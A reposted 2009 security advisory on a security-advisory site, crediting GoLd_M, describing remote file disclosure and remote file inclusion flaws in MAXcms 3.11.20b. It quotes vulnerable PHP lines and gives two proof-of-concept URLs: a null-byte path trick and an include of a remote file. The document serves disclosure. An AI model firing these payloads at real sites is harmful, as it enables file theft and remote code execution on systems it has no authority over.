MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities

2009.09.28
Credit: GoLd_M
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22
CWE-94

MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities I- Remote File Disclosure Vulnerabilities In /includes/inc.thcms_admin_dirtree.php (Code) 22: if ($_GET["getjs"]=="1") { <<-------!! 23: readfile($thCMS_root."/includes/wz_dragdrop.js");<<-------!! 24: exit; 25: } POC : http://localhost//microcms/includes/inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=inc.thcms_admin_dirtree.php%00 ##################### II- Remote File Inclusion Vulnerabilities In /includes/file_manager/special.php (Code) 01: <?php 02: /** 03: * Hier wird $af_pk &#195;&#188;bergeben. 04: * Das ist die PK aus der Tabelle adovo_filedata auf den einen Datensatz. 05: */ 06: 07: include($fm_includes_special); <<-------!! 08: 09: ?> POC : http://localhost//microcms/includes/file_manager/special.php?fm_includes_special=http://localhost/020.txt Thanx To .___________..______ ____ ____ ___ _______ | || _ \ \ \ / / / \ / _____| `---| |----`| |_) | \ \/ / / ^ \ | | __ | | | / \_ _/ / /_\ \ | | |_ | | | | |\ \----. | | / _____ \ | |__| | |__| | _| `._____| |__| /__/ \__\ \______| ___ ______ ___ _______ _______ .___ ___. ____ ____ / \ / | / \ | \ | ____|| \/ | \ \ / / / ^ \ | ,----' / ^ \ | .--. || |__ | \ / | \ \/ / / /_\ \ | | / /_\ \ | | | || __| | |\/| | \_ _/ / _____ \ | `----./ _____ \ | '--' || |____ | | | | | | /__/ \__\ \______/__/ \__\ |_______/ |_______||__| |__| |__| Tryag.Cc

References:

http://www.vupen.com/english/advisories/2009/2136
http://www.milw0rm.com/exploits/9350
http://secunia.com/advisories/36105


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top